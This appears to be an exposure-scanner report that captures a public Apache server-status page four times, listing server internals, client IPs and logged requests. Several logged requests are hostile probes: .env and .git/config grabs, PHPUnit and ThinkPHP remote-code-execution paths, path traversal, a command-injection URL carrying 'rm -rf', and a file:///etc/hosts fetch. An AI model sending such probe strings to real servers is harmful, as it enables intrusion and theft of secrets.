139.59.136.184h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33926951060/6/7980_ 1.58121010083650.00.034065.01 139.59.136.184h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33926951060/9/7631_ 1.52128427110034190.00.062091.78 45.137.126.41http/1.1 1-33926951060/4/9362_ 1.74128409728540.00.011623.62 45.137.126.41http/1.1localhost:80GET /sendgrid/.env HTTP/1.1 1-33926951060/5/7345_ 1.4512079895770.00.031163.50 139.59.136.184http/1.1 1-33926951060/5/8149_ 1.17129813540.00.011368.91 139.59.136.184http/1.1 1-33926951060/7/8238_ 1.85116910155590.00.011842.99 139.59.136.184http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-33926951060/8/7265_ 1.63109625650.00.012008.97 94.75.224.180http/1.1 1-33926951060/15/7682_ 1.63129512730.00.032349.12 162.19.236.43http/1.1localhost:80POST / HTTP/1.1 1-33926951060/7/7349_ 1.86013712679120.00.061966.83 139.59.136.184http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-33926951060/6/8304_ 1.64009745410.00.011902.25 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-33926951060/8/7372_ 1.8701349944860.00.053158.08 139.59.136.184http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-33926951060/3/7607_ 1.50029904630.00.013645.39 45.33.91.213http/1.1 1-33926951060/13/7576_ 1.87014710144790.00.061236.42 139.59.136.184http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-33926951060/4/7351_ 1.50009622360.00.021607.88 45.137.126.9http/1.1 2-330-0/0/2604. 0.007392141963429060.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48050ec00785
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 24-Oct-2024 15:28:34 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 338 Parent Server MPM Generation: 337 Server uptime: 335 days 8 hours 28 minutes 55 seconds Server load: 0.00 0.00 0.00 Total accesses: 577063 - Total Traffic: 62.2 GB - Total Duration: 80377861 CPU Usage: u962.13 s1883.3 cu6128.85 cs1718.87 - .0369% CPU load .0199 requests/sec - 2305 B/second - 113.0 kB/request - 139.288 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02686637no0yes025000 12686638no0yes124000 Sum200 149000 __________________________________W_______________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33726866370/4/5979_ 0.749540929046950.00.02110.49 78.153.140.223http/1.1ravignon.mycloud.paris:443GET /.env.$APP_ENV HTTP/1.1 0-33726866370/4/5921_ 0.8595401568384390.00.0384.70 78.153.140.223http/1.1ravignon.mycloud.paris:443GET /.env_sample HTTP/1.1 0-33726866370/2/6031_ 0.73108749530.00.0095.38 209.97.180.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33726866370/4/5931_ 0.6695401858665930.00.04102.56 78.153.140.223http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-33726866370/8/6021_ 0.90446908864280.00.04109.16 45.84.89.2http/1.1localhost:80GET / HTTP/1.1 0-33726866370/3/6043_ 0.6692901589029590.00.02127.90 74.82.47.3h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33726866370/5/6023_ 0.7594201088674390.00.0677.49 74.82.47.3http/1.1 0-33726866370/6/5959_ 0.89674028634110.00.0699.96 80.82.77.202http/1.1localhost:80GET / HTTP/1.0 0-33726866370/5/5915_ 0.9312688808930.00.0491.75 209.97.180.8http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33726866370/5/5996_ 0.91360529216330.00.02174.43 123.240.211.243http/1.1localhost:80GET / HTTP/1.0 0-33726866370/3/5980_ 0.831221248659830.00.0281.00 78.153.140.223http/1.1ravignon.mycloud.paris:443GET /.env.test HTTP/1.1 0-33726866370/6/5940_ 0.731221298666150.00.0372.68 78.153.140.223http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-33726866370/3/6017_ 0.9212719135770.00.0496.18 185.191.126.248http/1.1localhost:80GET / HTTP/1.1 0-33726866370/7/5985_ 0.7944661458886860.00.0486.27 45.84.89.2http/1.1 0-33726866370/7/6016_ 0.7845101468835580.00.0458.85 78.153.140.223http/1.1ravignon.mycloud.paris:443GET /.env.dist HTTP/1.1 0-33726866370/5/6066_ 0.90452129274310.00.0297.49 46.174.191.31http/1.1localhost:80GET / HTTP/1.0 0-33726866370/8/5992_ 0.8411568963680.00.04133.93 78.153.140.223http/1.1ravignon.mycloud.paris:443GET /.env_old HTTP/1.1 0-33726866370/3/5921_ 0.7659381558763510.00.02117.98 78.153.140.223http/1.1ravignon.mycloud.paris:443GET /.env.dev.local HTTP/1.1 0-33726866370/7/5942_ 0.71593818488990.00.0294.03 78.153.140.223http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-33726866370/3/5883_ 0.89594318933510.00.0189.99 179.43.191.98http/1.1localhost:80GET / HTTP/1.1 0-33726866370/2/5918_ 0.60360308439400.00.0066.22 179.43.168.146http/1.1localhost:80GET /.git/config HTTP/1.1 0-33726866370/4/5909_ 0.91339008900050.00.0671.94 81.250.142.187http/1.1localhost:80GET / HTTP/1.1 0-33726866370/5/5831_ 0.91175128430210.00.0379.67 152.32.235.85http/1.1localhost:80GET / HTTP/1.1 0-33726866370/5/5921_ 0.72339018863440.00.0293.22 81.250.142.187http/1.1 0-33726866370/5/5928_ 0.7217501888913280.00.03130.55 152.32.235.85http/1.1 1-33726866380/24/8573_ 6.0401569968290.00.141828.06 209.97.180.8http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-33726866380/26/8452_ 5.930310173810.00.141181.08 162.19.239.42http/1.1localhost:80POST / HTTP/1.1 1-33726866380/24/7422_ 5.93019512200.00.151543.69 95.214.55.43http/1.1localhost:80GET / HTTP/1.1 1-33726866380/28/8141_ 6.0601519852960.00.091705.04 209.97.180.8http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-33726866380/21/7444_ 6.0601519953950.00.061292.15 209.97.180.8http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-33726866380/25/9465_ 5.901010054050.00.141501.15 209.97.180.8http/1.1 1-33726866380/18/7715_ 6.0701479758100.00.041651.55 209.97.180.8http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33726866380/23/9929_ 5.6601649978500.00.131824.72 162.19.239.42http/1.1 1-33726866380/21/7945_ 5.89109676020.00.101352.32 209.97.180.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33726866381/30/8387W 5.930010102970.00.071691.63 209.97.180.8http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-33726866380/20/8413_ 5.5511279495930.00.071959.73 209.97.180.8http/1.1 1-33726866380/15/7937_ 5.68111810071810.00.104064.82 209.97.180.8http/1.1 1-33726866380/27/7581_ 5.5279412510024780.03.272091.61 154.213.184.23http/1.1 1-33726866380/19/9317_ 6.0311929717850.00.071623.43 209.97.180.8http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33726866380/21/7313_ 6.0501879885470.00.121163.30 209.97.180.8http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-33726866380/17/8100_ 5.4311439806920.00.051368.73 209.97.180.8http/1.1 1-33726866380/23/8200_ 6.04117810041380.00.171842.90 209.97.180.8http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-33726866380/18/7217_ 5.91119621900.00.112008.87 209.97.180.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33726866380/27/7625_ 5.93019505250.00.152348.93 103.109.72.55http/1.1localhost:80GET / HTTP/1.0 1-33726866380/30/7301_ 5.54116412660840.00.111966.59 209.97.180.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33726866380/29/8259_ 5.4211289733280.00.111902.08 209.97.180.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33726866380/24/7325_ 5.9211379925150.00.143157.80 209.97.180.8http/1.1 1-33726866380/25/7565_ 5.93009896590.00.153645.25 162.19.239.42http/1.1localhost:80GET /.env HTTP/1.1 1-33726866380/19/7501_ 5.921110129420.00.111236.19 138.68.191.203http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33726866380/29/7321_ 5.92119617000.00.151607.77 176.240.200.126http/1.1localhost:80HEAD / HTTP/1.1 2-330-0/0/2604. 0.005741131963429060.00.005
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805a605a58b
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Tuesday, 22-Oct-2024 05:22:54 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 336 Parent Server MPM Generation: 335 Server uptime: 332 days 22 hours 23 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 572210 - Total Traffic: 62.2 GB - Total Duration: 80318374 CPU Usage: u950.52 s1868.42 cu6099.62 cs1706.2 - .0369% CPU load .0199 requests/sec - 2321 B/second - 114.0 kB/request - 140.365 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02677587no0yes025000 12677588no0yes124000 Sum200 149000 _________________________________________W________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33526775870/4/5842_ 0.50109040240.00.03110.23 64.226.65.160http/1.1 0-33526775870/5/5774_ 0.50108374090.00.0084.38 64.226.65.160http/1.1 0-33526775870/3/5912_ 0.50108746050.00.0095.20 64.226.65.160http/1.1 0-33526775870/5/5799_ 0.5061308654080.00.02102.29 150.241.68.241http/1.1localhost:80GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 0-33526775870/5/5883_ 0.5061308840150.00.01105.92 150.241.68.241http/1.1localhost:80GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-33526775870/5/5929_ 0.5061308906810.00.03124.70 150.241.68.241http/1.1localhost:80GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 0-33526775870/6/5892_ 0.50108666690.00.0277.09 64.226.65.160h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33526775870/4/5844_ 0.50108625230.00.0199.70 64.226.65.160h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33526775870/6/5787_ 0.50108798960.00.0191.48 64.226.65.160h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33526775870/7/5880_ 0.5211499210640.00.04174.19 64.226.65.160http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33526775870/5/5855_ 0.5061308642570.00.0180.69 150.241.68.241http/1.1 0-33526775870/4/5816_ 0.5161308655170.00.0072.40 150.241.68.241http/1.1localhost:80GET /containers/json HTTP/1.1 0-33526775870/8/5897_ 0.5161319116890.00.0695.80 150.241.68.241http/1.1localhost:80GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1 0-33526775870/3/5874_ 0.50108873410.00.0086.01 150.241.68.241http/1.1localhost:80GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 0-33526775870/5/5891_ 0.5161328828920.00.0058.51 150.241.68.241http/1.1localhost:80GET /index.php?s=/index/\\think\\app/invokefunction&function=call 0-33526775870/3/5948_ 0.50109263760.00.0097.22 64.226.65.160http/1.1 0-33526775870/6/5850_ 0.5701578943970.00.02130.71 64.226.65.160http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-33526775870/3/5780_ 0.50008750550.00.00117.64 150.241.68.241http/1.1localhost:80GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 0-33526775870/6/5838_ 0.50108488880.00.0593.90 64.226.65.160http/1.1 0-33526775870/5/5769_ 0.5161318930620.00.0289.75 150.241.68.241http/1.1localhost:80GET /index.php?lang=../../../../../../../../usr/local/lib/php/p 0-33526775870/6/5778_ 0.5161308432900.00.0165.94 150.241.68.241http/1.1localhost:80GET /public/index.php?s=/index/\\think\\app/invokefunction&functi 0-33526775870/7/5795_ 0.570778889820.00.0271.60 64.226.65.160http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33526775870/3/5693_ 0.50108422320.00.0079.31 64.226.65.160h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33526775870/5/5799_ 0.50008859730.00.0292.99 150.241.68.241http/1.1localhost:80GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-33526775870/5/5795_ 0.50108907330.00.02130.32 64.226.65.160h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33526775880/1/8507_ 0.00039960480.00.011827.79 220.133.166.246http/1.1localhost:80GET / HTTP/1.0 1-33526775880/2/8374_ 0.2906010160820.00.011180.84 64.226.65.160http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-33526775880/1/7351_ 0.0302749503480.00.021543.48 167.94.146.58http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33526775880/1/8072_ 0.1344391179842070.00.021704.86 185.224.128.83http/1.1ravignon.mycloud.paris:443GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-33526775880/1/7379_ 0.2744401279951070.00.021292.04 184.105.247.196http/1.1ravignon.mycloud.paris:443GET /geoserver/web/ HTTP/1.1 1-33526775880/1/9388_ 0.24467917510040080.00.021500.93 184.105.247.196http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33526775880/1/7641_ 0.12461019748100.00.011651.41 165.232.33.216http/1.1 1-33526775880/0/9857_ 0.00488129961640.00.001824.51 184.105.247.196h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33526775880/0/7875_ 0.00467949667960.00.001352.15 167.94.138.51http/1.1 1-33526775880/1/8317_ 0.140410097590.00.001691.50 95.214.55.43http/1.1localhost:80GET / HTTP/1.1 1-33526775880/0/8333_ 0.00501209489670.00.001959.55 184.105.247.196http/1.1 1-33526775880/1/7866_ 0.2807910066980.00.004064.66 64.226.65.160http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-33526775880/1/7507_ 0.140110015080.00.002088.23 185.224.128.67http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-33526775880/1/9260_ 0.16727519713400.00.011623.30 185.191.126.248http/1.1localhost:80GET / HTTP/1.1 1-33526775880/1/7249_ 0.16009876290.00.011163.12 185.224.128.47http/1.1localhost:80GET / HTTP/1.1 1-33526775880/1/8041_ 0.290629800500.00.001368.60 64.226.65.160http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33526775881/0/8128W 0.000010025240.00.001842.68 64.226.65.160http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-33526775880/1/7157_ 0.280619608890.00.002008.69 64.226.65.160http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-33526775880/0/7559_ 0.0047002229496200.00.002348.72 167.94.138.51http/1.1 1-33526775880/1/7233_ 0.214700012647420.00.001966.38 80.82.77.202http/1.1localhost:80\x16\x03\x02\x01o\x01 1-33526775880/1/8188_ 0.0872752689728640.00.021901.92 185.191.126.248http/1.1 1-33526775880/0/7262_ 0.00488109915740.00.003157.62 184.105.247.196h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33526775880/1/7506_ 0.280779886160.00.003645.01 64.226.65.160http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-33526775880/1/7441_ 0.057275010118900.00.001235.97 185.191.126.248http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805f7f8d0f9
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 20-Oct-2024 09:02:01 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 334 Parent Server MPM Generation: 333 Server uptime: 331 days 2 hours 2 minutes 22 seconds Server load: 0.00 0.00 0.00 Total accesses: 570712 - Total Traffic: 62.2 GB - Total Duration: 80225989 CPU Usage: u945.29 s1857.76 cu6087.31 cs1702.81 - .037% CPU load .02 requests/sec - 2333 B/second - 114.2 kB/request - 140.572 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02669212no0yes124000 12669213no0yes025000 Sum200 149000 _W________________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33326692120/5/5817_ 0.701949037820.00.03110.16 185.242.226.117http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33326692121/1/5744W 0.62008370390.00.0284.28 146.190.103.103http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-33326692120/3/5878_ 0.8311808744780.00.0195.15 146.190.103.103http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-33326692120/2/5775_ 0.51318650520.00.01102.23 207.154.220.111http/1.1 0-33326692120/5/5852_ 0.8231528838400.00.03105.84 146.190.103.103http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-33326692120/4/5896_ 0.8221528898340.00.01124.51 146.190.103.103http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-33326692120/2/5859_ 0.28208650010.00.0176.87 18.192.207.245http/1.1 0-33326692120/3/5816_ 0.8401588620310.00.0099.64 146.190.103.103http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-33326692120/6/5757_ 0.7001208789010.00.0691.35 146.190.103.103http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33326692120/4/5842_ 0.531109198860.00.03174.02 146.190.103.103h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33326692120/2/5830_ 0.1810238628220.00.0080.57 146.190.103.103h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33326692120/5/5783_ 0.6210618644890.00.0572.24 146.190.103.103h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33326692120/0/5867_ 0.00919109210.00.0095.61 146.190.103.103http/1.1 0-33326692120/5/5836_ 0.62938868830.00.0185.89 146.190.103.103http/1.1 0-33326692120/1/5858_ 0.32948824590.00.0058.42 146.190.103.103http/1.1 0-33326692120/4/5918_ 0.638719261080.00.0797.02 146.190.103.103h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33326692120/2/5812_ 0.3472868936280.00.03130.56 146.190.103.103h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33326692120/2/5749_ 0.577708746800.00.03117.56 146.190.103.103http/1.1 0-33326692120/4/5801_ 0.6471518471740.00.0493.73 146.190.103.103http/1.1 0-33326692120/2/5732_ 0.8062178910840.00.0189.55 146.190.103.103http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33326692120/2/5744_ 0.6652048426320.00.0565.81 207.154.220.111http/1.1ravignon.mycloud.paris:443GET /teorema505?t=1 HTTP/1.1 0-33326692120/2/5762_ 0.8151538883050.00.0171.49 146.190.103.103http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-33326692120/3/5659_ 0.66408410960.00.0479.23 47.88.6.178http/1.1localhost:80GET /Public/home/js/check.js HTTP/1.1 0-33326692120/2/5775_ 0.814818843700.00.0092.88 146.190.103.103http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-33326692120/1/5761_ 0.27418899670.00.01130.20 207.154.220.111http/1.1 1-33326692130/4/8477_ 0.44708639941140.00.031827.59 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-33326692130/2/8344_ 0.18746010156520.00.001180.74 18.192.207.245http/1.1 1-33326692130/5/7315_ 0.41103009478130.00.011543.20 103.215.25.250http/1.1localhost:80HEAD /invoker/JMXInvokerServlet HTTP/1.1 1-33326692130/4/8033_ 0.41103519840620.00.031704.74 175.151.221.106http/1.1localhost:80GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tm 1-33326692130/5/7346_ 0.50103609939630.00.041291.85 47.251.11.3http/1.1localhost:80GET /static/admin/javascript/hetong.js HTTP/1.1 1-33326692130/3/9366_ 0.301035010020750.00.021500.81 139.59.62.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33326692130/3/7615_ 0.41103109746240.00.021651.30 103.215.25.250http/1.1localhost:80HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.sy 1-33326692130/2/9824_ 0.1874609832480.00.021824.29 18.192.207.245http/1.1 1-33326692130/3/7852_ 0.3174629664120.00.011352.07 18.192.207.245http/1.1 1-33326692130/3/8293_ 0.329807210054990.00.031688.39 185.191.126.248http/1.1localhost:80GET / HTTP/1.1 1-33326692130/3/8313_ 0.4274619487170.00.011959.47 18.192.207.245http/1.1 1-33326692130/3/7829_ 0.249295010056690.00.004064.44 205.210.31.37http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 1-33326692130/3/7479_ 0.339294510010140.00.002088.09 80.66.77.235http/1.1localhost:80GET / HTTP/1.1 1-33326692130/3/9233_ 0.24750709687040.00.001623.08 68.183.14.208http/1.1 1-33326692130/4/7225_ 0.49149809866870.00.001162.95 207.154.220.111http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33326692130/4/8012_ 0.40139209787470.00.041368.48 179.43.191.98http/1.1localhost:80GET / HTTP/1.1 1-33326692130/3/8098_ 0.181498010013770.00.001842.51 138.197.131.20http/1.1 1-33326692130/3/7135_ 0.25708609581520.00.002005.56 54.36.115.221http/1.1 1-33326692130/3/7528_ 0.44526339469870.00.002348.53 185.242.226.115http/1.1localhost:80GET / HTTP/1.1 1-33326692130/4/7206_ 0.26525810712525880.00.021965.55 138.197.131.20http/1.1 1-33326692130/2/8162_ 0.18525709705980.00.001901.79 138.197.131.20http/1.1 1-33326692130/3/7233_ 0.18217809887140.00.023154.55 159.89.85.191http/1.1 1-33326692130/5/7479_ 0.49139719854050.00.023641.86 179.43.191.98http/1.1localhost:80GET / HTTP/1.1 1-33326692130/3/7413_ 0.191392110009060.00.021235.84 54.36.115.221http/1.1 1-33326692130/4/7232_ 0.50104029592810.00.011607.37 47.251.14.232http/1.1localhost:80GET / HTTP/1.1 2-330-0/0/2604. 0.002053191963429060.00.0051.60 143.244.139.14http/1.1 2-330-0/0/2568. 0.00<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48051d3ac7fc
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 18-Oct-2024 08:40:22 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 332 Parent Server MPM Generation: 331 Server uptime: 329 days 1 hour 40 minutes 42 seconds Server load: 0.08 0.02 0.01 Total accesses: 568803 - Total Traffic: 62.2 GB - Total Duration: 80184283 CPU Usage: u940.09 s1847.3 cu6072.65 cs1697.65 - .0371% CPU load .02 requests/sec - 2347 B/second - 114.6 kB/request - 140.97 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02660647no0yes025000 12660648no0yes124000 Sum200 149000 _______________________________________________W__.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33126606470/2/5797_ 0.3485261359023490.00.02107.12 78.153.140.179http/1.1ravignon.mycloud.paris:443GET /staticfiles/.env HTTP/1.1 0-33126606470/2/5727_ 0.4585262078367110.00.0284.17 185.180.140.103http/1.1ravignon.mycloud.paris:443GET /favicon.ico HTTP/1.1 0-33126606470/2/5856_ 0.4785061858742900.00.0295.12 65.49.1.93http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33126606470/1/5753_ 0.2287183428649230.00.00102.15 65.49.1.90http/1.1 0-33126606470/1/5825_ 0.01188518828590.00.00105.72 54.36.115.221http/1.1 0-33126606470/2/5877_ 0.2218841588895410.00.03124.46 78.153.140.179http/1.1ravignon.mycloud.paris:443GET /developer/.env HTTP/1.1 0-33126606470/4/5832_ 0.5718841118646660.00.0676.79 45.148.10.235http/1.1ravignon.mycloud.paris:443GET /api/geojson?url=file:///etc/hosts HTTP/1.1 0-33126606470/3/5800_ 0.3131668616560.00.0399.54 142.93.0.66http/1.1 0-33126606470/0/5732_ 0.0087186148783170.00.0091.27 65.49.1.92h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33126606470/2/5819_ 0.3387181349192960.00.03173.94 65.49.1.88http/1.1 0-33126606470/2/5813_ 0.3585061748626570.00.0480.51 78.153.140.179http/1.1ravignon.mycloud.paris:443GET /tmp/.env HTTP/1.1 0-33126606470/4/5752_ 0.4982071928640480.00.0372.14 65.49.1.83http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-33126606470/1/5849_ 0.3682071629109090.00.0295.58 78.153.140.179http/1.1ravignon.mycloud.paris:443GET /v2/.env HTTP/1.1 0-33126606470/2/5814_ 0.5078711588866340.00.0285.81 135.125.244.52http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-33126606470/2/5844_ 0.37787138822890.00.0058.38 80.66.77.238http/1.1localhost:80GET / HTTP/1.1 0-33126606470/3/5892_ 0.51314249254430.00.0096.87 185.189.182.234http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-33126606470/2/5795_ 0.3931421158930820.00.02130.50 185.242.226.117http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33126606470/1/5725_ 0.24251048737060.00.00117.42 51.15.104.9http/1.1 0-33126606470/3/5770_ 0.3918867868459480.00.0090.70 45.148.10.235h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33126606470/1/5708_ 0.2518861528904920.00.0289.45 45.148.10.235http/1.1 0-33126606470/4/5724_ 0.551885818421580.00.0465.73 45.148.10.235http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 0-33126606470/1/5738_ 0.2718851728877530.00.0271.38 78.153.140.179http/1.1ravignon.mycloud.paris:443GET /localhost/.env HTTP/1.1 0-33126606470/4/5636_ 0.561885678408890.00.0479.15 45.148.10.235http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-33126606470/3/5757_ 0.56188538836370.00.0392.77 45.148.10.235http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-33126606470/1/5739_ 0.2818851328896870.00.02130.15 197.52.45.14http/1.1 1-33126606480/8/8417_ 1.30149918690.00.061827.24 45.148.10.235http/1.1 1-33126606480/5/8302_ 1.504310155050.00.071180.63 142.93.0.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33126606480/5/7261_ 1.7611419471660.00.051543.06 142.93.0.66http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-33126606480/6/7971_ 1.470619819570.00.091704.45 45.148.10.235http/1.1ravignon.mycloud.paris:443GET /config.json HTTP/1.1 1-33126606480/8/7302_ 1.7801419933740.00.051291.62 142.93.0.66http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33126606480/8/9306_ 1.77114710005600.00.121500.54 142.93.0.66http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-33126606480/4/7559_ 1.35429732910.00.031651.07 142.93.0.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33126606480/5/9758_ 1.46009825580.00.031824.09 45.148.10.235http/1.1ravignon.mycloud.paris:443GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e 1-33126606480/4/7802_ 1.35419652180.00.021351.86 142.93.0.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33126606480/8/8234_ 